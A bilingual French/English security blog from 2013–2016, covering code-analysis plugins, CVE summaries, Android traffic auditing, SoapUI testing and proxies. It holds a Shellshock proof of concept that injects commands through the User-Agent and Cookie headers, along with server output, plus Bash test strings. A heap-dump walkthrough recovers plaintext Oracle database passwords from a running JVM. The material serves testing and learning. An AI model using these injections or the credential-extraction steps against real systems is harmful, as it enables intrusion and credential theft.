20 Apr 2016

Ajouter des plugins de sécurité gratuits dans Eclipse | Adding free security plugins in Eclipse

Install Plugins

Install FindBugs and SonarLint by performing these steps:
  • Start Eclipse
  • Menu Help / Eclipse Marketplace
  • Search for FindBugs, install it.
  • Search for SonarLint for Eclipse, choose the optional Java Configuration Helper and install it
Add Find Security Bugs plugin for FindBugs
  • Download the plugin jar file from http://find-sec-bugs.github.io
  • Click Window -> Preferences then go to Java -> FindBugs
  • Open Plugins and misc. Settings tab and click Add to add the Find Security Bugs plugin jar file to the list
  • Restart Eclipse

Enable analysis

For each project you have in Eclipse:
  • Right-click on it and click the menu Configure / Enable SonarLint
Note that Findbugs is already usable after installation so there's no need to enable it for each project.

Using Findbugs

  • Right-click on the project in Eclipse and select the menu Find Bugs / Find Bugs
  • Wait for the analysis to complete - a popup dialog will open, show progress and then close automatically.
  • Open the Bug Explorer. The first time, you will need to select the Eclipse menu Window / Show View / Other / FindBugs / Bug Explorer

Using SonarLint

  • Right click on the project in Eclipse and select the menu SonarLint / Analyze all files
  • View the progress in the Eclipse Console
  • View the Sonar markers in your source code.
  • Occasionally update your analyzers via Help / Update SonarLint Analyzers

For a quick intro, go on the SonarLint for Eclipse web page.

19 Apr 2016

Recherche de mot de passe de BD dans la mémoire Java | Searching for Oracle database passwords in Java VM

Voici un petit truc pour rechercher des mots de passe (en texte clair) de BD Oracle en mémoire de processus Java. Les programmes utilisés proviennent du JDK standard d'Oracle.

Lister les programmes java en utilisant jps:
$ jps
32488 MainClassName
1945 Jps
La commande jps permet d'avoir la liste des processus java "instrumentés". L'autre approche (plus inclusive) serait d'utiliser quelque chose comme pgrep java.

Lorsqu'on a le PID, on peut utiliser jmap pour générer une image de la mémoire:
$ jmap -heap:format=b 32488
Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created
Une fois l'image créée, on peut l'analyser en utilisant jhat. Cette commande démarre un serveur web qui permet l'analyse.
[t903335@slave1 ~]$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]
WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
En connectant sur le port mentionné ci-haut avec un navigateur web (http://127.0.0.1:7000/), on obtient la liste de classes java trouvées en mémoire. Au bas de la page, il y a un lien intitulé Execute Object Query Language (OQL) query qui nous envoie à /oql. Cette page permet d'exécuter des recherches ciblées de la mémoire.

En faisant un peu de recherche, j'ai remarqué que pour trouver le mot de passe qui est envoyé à la BD, il suffit d'exécuter cette recherche OQL: 
OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")
Si ce pilote JDBC est utilisé par le programme java, on obtiendra un lien vers cette classe. En cliquant sur ce lien, on a l'option de visionner ses instances en cliquant sur le lien Instances: Exclude subclasses. Dans la page suivante on verra quelque chose comme:

oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.

En cliquant sur le lien vers l'instance, on aura une page suivante qui montrera les différentes valeurs des différents attributs de l'objet en question. Parmi un de ces attributs se trouve password, userName et database (URI). Bien sûr, toutes les valeurs sont les valeurs originales (dans le clair)!

Il me reste à rechercher comment on peut éviter cette exposition continue en mémoire du mot de passe à même le pilote JDBC de Oracle. J'espère que ce n'est qu'une erreur d'implantation (par le développeur-utilisateur du pilote).

Référence OQL: https://visualvm.java.net/oqlhelp.html
__________________________

Below is a trick for finding clear text password in Java VM memory when a java program utilizes (one of) the JDBC driver(s) from Oracle (ojdbc6.jar I think). The commands used come from the standard Oracle JDK..

To list java programs, use jps:
$ jps
32488 MainClassName
1945 Jps
The jps command lists the instrumented java processes. Another approach to get a more incluse list would be to use something like pgrep java.

Once we have the PID, we can use jmap to dump the java process memory to disk:
$ jmap -heap:format=b 32488
Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created
Once we have the memory dump, we can analyze it using jhat. This command also starts a web server for the analyst.
$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]
WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
When connecting to that port with a web browser (http://127.0.0.1:7000/), we obain a list of java classes found in memory. At the bottom of the page, there's a link Execute Object Query Language (OQL) query that brings us to /oql. This page allows searching for structured memory content.

After a bit of tinkering, I figured out that to find the database password, all I needed to do is to run this OQL query: 
OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")
If this JDBC driver is used in the java program, we obtain a link to this class. When clicking that link, we can view its instance(s) by clicking on Instances: Exclude subclasses. In the following page, we get something like:
oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.
When clicking on the link for the instance, we get another page with different attributes and corresponding values within the object. As part of these, we find the attributes named password, userName and database (URI). Of course, all of those values are in the clear!

Now, I need to find a way to avoid this continuous exposure in memory when using Oracle drivers. There's hopefully a better way to use it or simply a better driver altogether...

More details on OQL: https://visualvm.java.net/oqlhelp.html

10 Apr 2016

17 Jan 2016

Vulnérabilités communes à tester manuellement | CWEs to test manually

Vulnérabilités qui ne sont pas (toujours) bien détectées de façon automatique, qui nécessitent un test manuel (après le balayage).
Vulnerabilities that that scanners don't (always) find reliably, that warrant a manual test
  • CWE-285 Improper Access Control (Authorization)
  • CWE-306 Missing Authentication for Critical Function
  • CWE-311 Missing Encryption of Sensitive Data [A06]
  • CWE-352 Cross-Site Request Forgery (CSRF) [A08]
  • CWE-434 Unrestricted Upload of File with Dangerous Type
  • CWE-798 Use of Hard-coded Credentials  
Top 10 (2013)
  • A02 Broken Authentication and Session  Management
  • A04 Insecure Direct Object References 
  • A05 Security Misconfiguration
  • A06 Sensitive Data Exposure
  • A08 Cross-Site Request Forgery (CSRF)
  • A10 Unvalidated Redirects and Forwards
Celles qui son moins applicable or vérifiables. | Those that are less applicable (everywhere) or testable via black-box methods:
  • CWE-494 Download of Code Without Integrity Check
  • CWE-732 Incorrect Permission Assignment for Critical Resource
  • CWE-754 Improper Check for Unusual or Exceptional Conditions
  • CWE-770 Allocation of Resources Without Limits or Throttling 
  • CWE-807 Reliance on Untrusted Inputs in a Security Decision
  • [...]
Évidemment, cette liste est plutôt générique. On doit faire des choix selon le contexte, valider les problèmes relevés par les balayeurs (identifier les faux positifs, augmenter la sévérité/priorité selon l'exposition), essayer d'exploiter les certaines vulnérabilités récentes, essayer des nouvelles techniques, etc.

Of course, this is just a generic list. We still need to adapt our approach based on context, validate findings from scanners (identify false positives, adjust severity/priority based on exposure), try to exploit new vulns, try new techniqeus, etc.

10 Jan 2016

CVEs importants qui ont impactés nos web apps | Important CVEs that have impacted our web apps

Une liste non-exhaustive des CVEs qui ont eu un impact important et généralisé sur la sécurité de nos applications web.
A list of important CVEs that have had a great general impact on our web app security.
DROWN- CVE-2016-0800
The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to send a ServerVerify message before establishing that a client possesses certain plaintext RSA data, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a "DROWN" attack.

Resources:

FREAK - CVE-2015-0204

SSL/TLS vulnerability that allows an attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened encryption, which the attacker can break to steal or manipulate sensitive data.

Resources:

LOGJAM - CVE-2015-4000

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE.

Resources:

WinShock - CVE-2014-6321 - MS14-066

Schannel in Microsoft Windows Server allows remote attackers to execute arbitrary code via crafted packets.

Resources:

ShellShock (BashBug) - CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Resources:
Padding Oracle On Downgraded Legacy Encryption (POODLE). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack.

Resources:

Heartbleed - CVE-2014-0160

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c.
Resources:

Others worth mentioning



      References

      Brèches et Menaces 2015 | Threat & Breach Reports 2015


      27 Jan 2015

      Sélection d'applications Android | Choosing Android Apps

      Quelques idées de critères de sélection d'applications Android:
      1. Rechercher des applications soit en utilisant Google Play et en examinant les privilèges détaillés (Permissions: View Details) ou rechercher par permissions (critère: permission "INTERNET / Full network access" exclus) via le site IzzyOnDroid.
      2. L'application ne doit pas demander plus de privilèges que nécessaire
      3. Lorsque possible, l'application ne doit pas combiner la lecture de données personnelles (incluant fichiers, comptes Google, numéro de téléphone...) et l'accès réseau (full network access) à moins que l'auteur de l'application soit une source autoritaire (Google, Firefox...)
      4. Lorsque l'application a un besoin légitime de connecter vers l'Internet, elle ne doit pas avoir démontré des signes de fuites de données personnelles (ex.: connection vers des addresses inconnues), de surveillance (ex.: flurry.com) ou annonces publicitaires (ex.: admob.com). J'utilise NoRoot Firewall sur un appareil de test pendant un certain temps, je relève la liste de connections (addresses IP ou domaines) et j'arrive à ma propre conclusion. Pour investiguer des addresses IP, utilise une ressource comme robtex.com.
      5. L'application doit bien fonctionner, selon les besoins (rapide, efficace, lisible, adaptable). Payer pour avoir ce qu'on a vraiment besoin.
      Here's a criteria for selecting Android apps from the Google Play Store:
      • Search for apps in the Google Play Store and view the detailed permissions (Permissions: View Details) or search by permissions (criteria: Permission "INTERNET / Full Network Access" excluded) using the IzzyOnDroid site. 
      • Check that the app does not require more privileges than necessary.
      • When possible, the app should not combine the reading of personal data (files, Google accounts, telephone number...) and Internet access (full network access) unless it comes from an authoritative source (that is somewhat trusted) such as Google, Firefox, etc.
      • When the app has a legitimate need to connect to the Internet, it should not have exhibited signs of personal (or business) data leakage by connecting to unknown sites/domains, by connecting to monitoring sites (e.g. flurry.com) or advertising sites (e.g. admob.com). I utilize NoRoot Firewall on a test device for a certain time, I pull-up the list of connections and then I make my own conclusion. For target hosts that I only have the IP address for, I use robtex.com to investigate it further.
      • The application must function real well, as per my needs (fast, efficient, readable, adaptable). I much prefer to pay for an app that works as I want. Unfortunately, there aren't that many that fall outside of the Google realm and that meet the above criteria.

      3 Jan 2015

      Analyse de fuites sous Android | Data leakage analysis for Android

      Voici quelques idées d'approches pour analyser les connections réseau que nos applications Android essaient d'initier, sans avoir besoin de "rooter" l'appareil. Outils mentionnés: Android Connection Monitor (historique de connexions), NoRoot Firewall, (historique de connexions et contrôle du traffic sortant) tcpdump, tshark (historique des réponses DNS) et Robtex (analyse de réputation et des rôles des systèmes hôtes).

      On peut considérer la méthode décrite ici-bas comme une première partie, pour identifier quelle application spécifique se connecte à quel serveur. En deuxième lieu, on devra analyser le traffic détaillé via des techniques conventionnelles telles qu'avec Wireshark, un proxy d'interception SSL comme mitmproxy, etc. Ce qui n'est pas couvert ici (encore) mais cet article donne une très bonne idée..
      Below, I propose a few ideas to analyze network connections initiated by Android Apps, without the need to root the device. Tools mentioned: Android Connection Monitor (connection logs) NoRoot Firewall (connection logs, egress traffic control) tcpdump, tshark (DNS response logs) and Robtex (host reputation/purpose analysis).
      We should consider the method described below as a first step, to identify which specific app connects to which server. Secondly, we would need to analyze the traffic details by using tools such as Wireshark, an interception proxy such as  mitmproxy, etc. This it not covered here (yet) but this post gives very good ideas.

      Connection Monitor

      Démarrer Connection Monitor  |  Start Connection Monitor

      Installer Connection Manager sur l'appareil Android à partir de Google Play et démarrer l'application et sélectionner l'onglet Connections Log:
      Install Connection Manager on Android device from Google Play and start the app and select the Connections Log tab:


      Exporter l'historique des connections  |  Export Connection Logs

      Laisser l'application s'exécuter pendant un certain temps et exporter les données en sélectionnant l'onglet Settings et en choisissant la fonction Export Database and Send:
      Let the app run for a while and then export its data by selecting the Settings tab and by pressing Export Database and Send:


      NoRoot Firewall

      Démarrer NoRoot Firewall  |  Start NoRoot Firewall

      Installer NoRoot Firewall (de Greyshirts) à partir de Google Play.
      Install NoRoot Firewall from Google Play.

      Démarrer l'application NoRoot Firewall et presser sur Start et configurer pour exécution automatique lors de démarrage en activant Auto start on boot:
      Start NoRoot Firewall and press Start and configure to Auto start on Boot:

      Configurer NoRoot Firewall  |  Configure NoRoot Firewall

      Configurer les accès pour chaque application dans NoRoot Firewall via l'onglet "Pending Access" et en sélectionnant une application (ne pas presser sur Allow ou Deny):

      Configure access for each app in NoRoot Firewall by configuring each app under the Pending Access tab and by selecting each app (but don't press on Allow or Deny):



      Accepter ou rejeter chaque accès granulaire selon votre bon sens (accès minimum nécessaires) ou en faisant une recherche sur un site tel que Robtex ou SANS ISC.
      Accept or reject each granular network access based on your common sense (minimum access) and/or by researching via sites such as Robtex or SANS ISC.



      Après quelques répétitions, configurer des règles généralisées (mais conserver quelques répétitions):
      After a few repetitions for the same domains/subnets, configure a generalized rule (but keep the repetitions for future analysis):



      Répéter pour toutes les applications installées, de façon itérative, sous utilisation normale de tous les jours. Éventuellement, la plupart des applications seront configurée telles que voulues, permettant le traffic qu'on veut bien laisser passer, vers les domaines appropriés.

      Repeat for all installed apps iteratively, as a result of normal daily usage. Eventually, most of your apps will have been configured as needed, allowing traffic to pass or not, based on domain names and your own research.


      Les paragraphes qui suivent permettent d'extraire la configuration the NoRoot Firewall et de la visualiser à partir d'un PC (ou même de la transférer vers un autre appareil).
      The following paragraphs will allow you to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

      Faire une copie de sauvegarde vers PC  |  Backup data to PC

      Activer le mode USB debugging sur l'appareil Android:

      Turn on USB debugging on Android device:

      Connecter d'un PC vers l'appareil en utilisant adb et un cable USB (exemple avec Mac). Faire une copie de sauvegarde des données de NoRoot Firewall. Sur l'appareil, presser OK:
      Connect a PC to an Android via USB and use adb. Make a backup of the NoRoot Firewall data:
      (macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
      Now unlock your device and confirm the backup operation.
       


      Extraire les règles de NoRoot Firewall  |  Extract rules from NoRoot Firewall
      Télécharger Android Backup Extractor. Ensuite, extraire les fichiers du fichier de sauvegarde.
      Download  Android Backup Extractor. Then, extract the files from the backup.
      (macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
      Strong AES encryption not allowed
      Magic: ANDROID BACKUP
      Version: 3
      Compressed: 1
      Algorithm: none

      203264 bytes written to norootfw.tar.
      (macos)$ tar xvf norootfw.tar
      x apps/app.greyshirts.firewall/_manifest
      x apps/app.greyshirts.firewall/f/persistentlog.txt
      x apps/app.greyshirts.firewall/db/db-journal
      x apps/app.greyshirts.firewall/db/db
      x apps/app.greyshirts.firewall/sp/PREF.xml
      Extraire les données de la BD de NoRoot Firewall avec sqlite3:
      Extracting data from the NoRoot Firewall database with sqlite3:
      $ cd apps/app.greyshirts.firewall/db
      $ sqlite3 db
      SQLite version 3.7.13 2012-07-17 17:46:21
      Enter ".help" for instructions
      Enter SQL statements terminated with a ";"
      sqlite> .schema
      CREATE TABLE android_metadata (locale TEXT);
      CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE INDEX filter_pkg1 ON filter(pkgName);
      CREATE INDEX filter_pkg2 ON filter(pkg2Name);
      CREATE INDEX filter_pkg3 ON filter(pkg3Name);
      CREATE INDEX pend_pkg1 ON pending(pkgName);
      CREATE INDEX pend_pkg2 ON pending(pkg2Name);
      CREATE INDEX pend_pkg3 ON pending(pkg3Name);


      sqlite> select appName,serverIp,serverPort from filter order by appName;
      Aldiko Premium|*|-1
      Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
      Aldiko Premium|hit-block.opendns.com|443
      Android System|192.168.22.1|7
      Android System|*.cloudfront.net|80
      Android System|cache.google.com|80
      Android System|*|-1
      Calendar|*.1e100.net|443
      Calendar|64.233.*.*|443
      Calendar|64.233.171.95|443
      Calendar|qg-in-f95.1e100.net|443
      [...]


      sqlite> .output filter.txt
      sqlite> select appName,serverIp,serverPort from filter order by appName;


      sqlite> .output dump.sql
      sqlite> .dump

      Historique de résolution DNS  |  DNS Resolution History

      Liste complète des correspondances DNS  |  Full list of DNS mappings

      Si on veut obtenir une liste complète des réponses DNS obtenues sur le réseau, on peut utiliser tcpdump et tshark comme suit:
      If we need to obtain a full list of DNS name to IP address mappings, we can run tcpdump and let it collect this information and then get the mappings via tshark:
      (Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
      (attendre quelques heures  |  wait a few hours)
      (Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

      Running as user "root" and group "root". This could be dangerous.
      nrdp.nccp.netflix.com    107.21.213.110
      myip.opendns.com    166.62.205.221
      googlemail.l.google.com    74.125.226.21,74.125.226.22
      nrdp.nccp.netflix.com    50.17.199.72
      www.jourzero.com    173.194.68.121
      nrdp.nccp.netflix.com    184.73.164.236
      www.jourzero.com    64.233.171.121
      myip.opendns.com    166.62.205.221
      nrdp.nccp.netflix.com    184.73.248.203
      cdn0.nflximg.net    24.200.246.83,24.200.246.57

      Analyse de réputation  |  Reputation Analysis 

      Robtex.com

      Le site robtex.com est est outil très utile qui fait l'aggrégation de données d'analyse provenant de différentes sources (whois, blacklists, DNS, multi-hosting...). Simplement en allant à la page principale, on peut initier une recherge qui nous amènera aux détails appropriés.

      On peut aussi utiliser des liens direct tels que : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).
      For my needs, robtex.com has been a very useful tool for aggregating analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and initiating a search from the top input form will get you what you need. 
      You can also use direct URIs such as : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

      There's also a nice little trick described below for getting colored links and details via hovering...

      Intégration vers Robtex  |  Integration to Robtex

      Lorsqu'on affiche nos résultats d'analyse, on peut intégrer ces résultats avec des données du service Robtex, tel que décrit ici. Ce qui permet d'avoir des liens actifs avec couleur, en fonction de la réputation. La section suivante montre un exemple.
      When printing our results to screen, we can use robtex as described here. This would allow active links to be shown with colors and hovering capabilities. The next section shows an example of this.

      Consolider les données  |  Putting it all together

      Bien sûr, il est possible de simplifier et d'automatiser une bonne partie des étapes décrites ci-haut. Pour l'instant, j'ai les résultats suivants obtenus via un peu de scriptage pour identifier des connections à investiguer possiblement...
      Surely, it's possible to simplify and automate some of the above. But for now, I've only performed a bit of scripting to output sample results for some connections to maybe look into...

      App NameHost NameIP AddressPort
      Aldiko Premiumwww.aldiko.co184.168.221.1980

      (probably data.flurry.com)216.52.203.13443

      (probably data.flurry.com)74.217.75.110443

      static.86.130.76.144.clients.your-server.de144.76.130.8680
      Google Play Newsstandbs.serving-sys.com
      80
      iSyncrec2-174-129-19-57.compute-1.amazonaws.com
      443


      NB: if the above IP addresses aren't colored or hovering doesn't work, it may be that the javascript from robtex.com is blocked locally (via something like noscript) or your client is being blacklisted temporarily by the service (i.e. if you're reloading this page too often). If this happens, try later.


      29 Sep 2014

      Current Intel on BashBug / Shellshock

      CVEs
      CVE-2014-6271  (1st bug report)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
      GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

      CVE-2014-7169   (2nd bug/variant, aka AfterShock)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
      GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

      CVE-2014-7186   (3rd bug/variant found by Redhat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
      The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

      CVE-2014-7187    (4th bug/variant found by Redhat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
      Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

      CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-627
      Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

      CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
      Variant 2. (see Variant 1 CVE-2014-6277 for a description)

      From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

      Other Info
      GNU Patch Info
      List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
      Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

      Botnets

      Network Detection (IDS, IPS, WAF)
      • VRT and EmergingThreats posts showing this is being addressed for Snort
      • ...
      Exploits

      Bash Test Strings
      Command line tests to verify proper patching (and to somehow use in our detections):
      • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
      • Later patch: foo='() { echo Not patched; }' bash -c foo
      • (search for more...)

      25 Sep 2014

      Test pour Shellshock/BashBug | POC for ShellShock / BashBug CVE-2014-6271

      Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

      I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result though via a GET parameter though (either via URL-encoding or by just encoding spaces) but I just wanted to prove the point for myself quickly...


      Simple CGI Script on a vulnerable server

      /usr/lib/cgi-bin$ cat echo.sh
      #!/bin/bash
      echo -e "Content-type: text/plain\n\n"
      echo "hi ya! Is there a file in /tmp as a result of this?";
      echo "Output from env:"
      env



      GET request from attacker

      GET /cgi-bin/echo.sh HTTP/1.1
      Host: localhost
      Content-Length: 0
      User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
      Connection: keep-alive




      GET response received by attacker

      HTTP/1.1 200 OK
      Date: Thu, 25 Sep 2014 23:42:53 GMT
      Server: Apache/2.2.16 (Debian)
      Vary: Accept-Encoding
      Content-Length: 1866
      Keep-Alive: timeout=15, max=100
      Connection: Keep-Alive
      Content-Type: text/plain

      hi ya! Is there a file in /tmp as a result of this?
      Output from env:
      [...]
      HTTP_USER_AGENT=() { :
      }
      HTTP_COOKIE=() { :
      }
      _=/usr/bin/env



      Result on attacked server

      $ ls /tmp/Hacked*
      /tmp/HackedViaCookie /tmp/HackedViaUserAgent

      1 May 2014

      Getting started in web services testing with SoapUI and Mutillidae


      J'ai écrit cet article pour aider quiconque qui désire commencer à utiliser SoapUI pour vérifier la sécurité de services web (SOAP). Pour ce faire, on commence par mettre en place Mutillidae qui contient quelques services à tester. Par la suite, on exécute un test d'injection SQL.

      Excusez l'anglais. Je n'ai pas vraiment le temps de le traduire.  Mais une image vaut mille mots, n'est-ce pas?
      ______________


       This post is meant to help a security tester with setting up SoapUI and use it against the test web services included in Mutillidae.

      Setting up a local test environment with web services

      Setting up SoapUI

      • Setup SoapUI and create a test project for Mutillidae and load the various Mutillidae WSDL files and setup the associated test suites for each WSDL:
      •  As a simple test, double click getUserInformation and add username and password values as follows: 


      •   Click on the green Submit Request button and wait for the response in the right pane:
       


        Creating a security test

      •   Create a new Security Test:













      • Optionally, add another specific assertion, as demonstrated below.

      Note that adding an XPath assertion for many injection issue testing may not be a good idea. At least, you have to ensure that the assertion will cover all the cases. For example, below, we add an XPath expression to cover the case of a normal request (node count = 1) and the case of an empty result set (node count = 0).







        Running the test


        Inspecting the results








      16 Dec 2013

      Acquérir la mémoire vive avec Dumpit.

      Acquérir la mémoire vive avec Dumpit.

      Acquiring memory with Dumpit

      http://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216

      13 Nov 2013

      Proxy d'interception en mode "headless" | Headless intercepting proxy

      Voici les options utilisables que je connais pour intercepter du  traffic HTTP lorsque tout ce qu'on a est Kali Linux isolé (accédé via SSH sans aucune option d'accès X/VNC et sans accès Internet):
      Par exemple, on peut utilser le mode de défilement lors de la capture tout en sauvegardant les flots HTTP dans un fichier. Par la suite, on visionne les détails des flots en mode plein écran:
      # mitmdump -w /var/log/mitmdump-$$.log -v -p 8080
      192.168.2.109 GET http://www.jourzero.com/
          Host: www.jourzero.com
          User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          DNT: 1
          Connection: keep-alive
          If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
          If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

       << 304 Not Modified 0B

          Expires: Wed, 13 Nov 2013 17:30:43 GMT
          Date: Wed, 13 Nov 2013 17:30:43 GMT
          Cache-Control: private, max-age=0
          ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
          Server: GSE

      # mitmproxy -r /var/log/mitmdump-3099.log
      >> GET http://www.jourzero.com/
      ← 304 [empty content]
      ENTER

      2013-11-13 12:30:43 GET http://www.jourzero.com/
      ← 304 [empty content]
      Request                                   Response
      Host: www.jourzero.com
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
      If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      2013-11-13 12:30:43 GET http://www.jourzero.com/
                              ← 304 [empty content]
      TAB
      Request                                  Response
      Expires:        Wed, 13 Nov 2013 17:30:43 GMT
      Date:           Wed, 13 Nov 2013 17:30:43 GMT
      Cache-Control:  private, max-age=0 
      ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      Server:         GSE
                  


      Ces autres options offrent aussi un mode "headless" qui ne sont pas aussi simples à utiliser:
